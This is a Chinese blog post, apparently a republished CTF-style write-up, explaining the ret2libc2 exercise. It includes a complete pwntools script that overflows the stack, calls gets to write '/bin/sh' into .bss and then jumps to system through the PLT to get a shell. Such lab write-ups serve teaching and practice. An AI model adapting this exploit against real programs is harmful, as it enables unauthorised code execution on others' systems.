博客
关于我
ret2libc2
阅读量:551 次
发布时间:2019-03-09

本文共 916 字,大约阅读时间需要 3 分钟。

ret2libc2 问题的解决方法可以分为以下步骤:

  • 分析目标:目标是通过利用栈溢出攻击,在程序中执行 /bin/sh

  • 理解PLT 表:利用PLT表中的 _system 函数进行层级跳转,确保函数返回到正确的位置以避免无限循环。

  • 构造栈溢出攻击:通过构造一个栈溢出 payload,利用已知的函数返回地址和参数位置,确保控制权返回到 system 并传递正确的参数 /bin/sh

  • 利用 _system 函数:确保在 system 函数的参数中传递一个指向 sh 的指针,从而触发其执行。

  • 以下是实现该攻击的具体 payload 构造步骤:

    from pwn import *# 定义变量bss_addr = 0x0804A080gets_plt = 0x08048460sys_plt = 0x08048490pop_ret = 0x0804843d# 初始化过程io = process('./ret2libc2')io.recvuntil('What do you think ?')# 构造 payloadpayload = b'A' * 112payload += p32(gets_plt)         # 调用 gets 函数payload += p32(pop_ret)         # 跳转到返回点payload += p32(bss_addr)        # 调用 bss 段的地址payload += p32(sys_plt)         # 调用 _system 函数payload += b'aaaa'              # 显存填充payload += p32(bss_addr)         # 再次调用 bss 段的地址# 发送 payloadio.sendline(payload)io.sendline(b'/bin/sh')io.interactive()
    1. 测试和验证:使用工具如 gdb 进行调试,验证攻击是否成功,确保程序流程如预期执行,且没有遗漏或错误。
    2. 通过以上方法,可以有效地将控制权转移到 system 函数,并执行所需的代码片段,从而完成攻击目标。

    转载地址:http://yjzsz.baihongyu.com/

    你可能感兴趣的文章
    Plotly:如何在 plotly express 中找到趋势线的系数?
    查看>>
    Plotly:如何在桑基图中设置节点位置?
    查看>>
    Plotly:如何处理重叠的颜色条和图例?
    查看>>
    Plotly:如何手动设置 plotly express 散点图中点的颜色?
    查看>>
    Plotly:如何结合 make_subplots() 和 ff.create_distplot()?
    查看>>
    Plotly:如何绘制累积的“步骤“;直方图?
    查看>>
    Quartz进一步学习与使用
    查看>>
    Plotly条形图-根据正/负值更改颜色-python
    查看>>
    PLSQL developer12安装图解
    查看>>
    PLSQL Developer调试 存储过程和触发器
    查看>>
    PLSQL window操作
    查看>>
    plsql 存储过程 测试
    查看>>
    plsql 安装后database下拉没有东西
    查看>>
    PLSQL_Oracle PLSQL内置函数大全(概念)
    查看>>
    PLSQL_案例优化系列_体验逻辑结构如何影响SQL优化(案例3)
    查看>>
    PLSQL中INDEX BY TABLE的 DELETE操作
    查看>>
    plsql学习笔记---plsql相关概念,以及基础结构
    查看>>
    plsql数据库异常---plsql 登录后,提示数据库字符集(AL32UTF8)和客户端字符集(ZHS16GBK)不一致
    查看>>
    plsql查询乱码问题解决
    查看>>
    PLSQL的DBMS_GETLINE
    查看>>